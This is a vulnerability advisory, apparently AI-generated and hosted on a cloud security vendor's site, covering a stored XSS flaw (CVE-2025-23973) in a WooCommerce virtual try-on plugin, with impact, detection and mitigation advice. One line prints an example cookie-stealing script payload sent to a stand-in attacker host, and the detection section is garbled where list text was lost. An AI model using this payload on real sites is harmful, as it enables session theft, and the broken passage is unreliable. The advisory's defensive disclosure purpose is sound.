
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-23973 is a Stored Cross-Site Scripting (XSS) vulnerability in the SpecFit-Virtual Try On WooCommerce WordPress plugin developed by dugudlabs. It affects all plugin versions up to and including 10.0.17 (with some sources referencing earlier version thresholds such as 8.0.3 and 7.0.6). The vulnerability was reported on April 30, 2025, and publicly disclosed by Patchstack on June 18, 2025, with NVD publication on June 27, 2025. It carries a CVSS v3.1 base score of 7.1 (High/Medium) (Patchstack, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the Stored XSS variant. Insufficient sanitization or escaping of user-supplied input allows an unauthenticated attacker to inject malicious scripts that are persistently stored and later rendered in the browsers of site visitors or administrators. Exploitation requires no authentication (unauthenticated privilege level) but does require user interaction — a privileged user must visit or interact with a page containing the injected payload for the script to execute (Patchstack).
Successful exploitation allows an attacker to inject and persistently store malicious JavaScript, HTML redirects, or advertisement payloads within the affected WordPress site, which execute in the context of any user's browser upon visiting the compromised page. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or redirection of visitors to malicious sites. The changed scope (S:C) in the CVSS vector indicates the impact extends beyond the vulnerable component to the user's browser environment, affecting confidentiality, integrity, and availability at a low level each (Patchstack, Red Hat CVE).
No official patch is currently available for this vulnerability as of the time of disclosure. Patchstack has issued a virtual patching/mitigation rule to block exploitation attempts for users of their service. The EPSS score is very low at 0.00032, suggesting limited automated exploitation activity at this time. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, and no public PoC code or active in-the-wild exploitation campaigns have been reported (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or a payload that creates a rogue admin account.try-on-for-woocommerce) with unusually long or encoded parameter values; error logs showing script-related content in stored fields.<script>, javascript:, or encoded XSS payloads (e.g., %3Cscript%3E) in WordPress database tables associated with the SpecFit plugin (e.g., wp_options, wp_postmeta).wp-content/plugins/try-on-for-woocommerce/ directory.As of the disclosure date, no official patch has been released by the plugin developer (dugudlabs). Site administrators are advised to deactivate and remove the SpecFit-Virtual Try On WooCommerce plugin until a patched version becomes available. Patchstack users benefit from an automatically applied virtual patching rule that blocks exploitation attempts without requiring a code-level fix. Additionally, implementing a Web Application Firewall (WAF) with XSS filtering rules and enforcing strict Content Security Policy (CSP) headers can reduce exploitation risk (Patchstack).
The vulnerability was covered in the Wordfence Intelligence Weekly WordPress Vulnerability Report for the week of June 16–22, 2025, and was included in the CISA Vulnerability Summary Bulletin (SB25-181) for the week of June 23, 2025, indicating routine industry tracking. No notable individual researcher commentary or significant social media discussion has been identified beyond standard vulnerability aggregation and reporting (Wordfence, CISA Bulletin).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."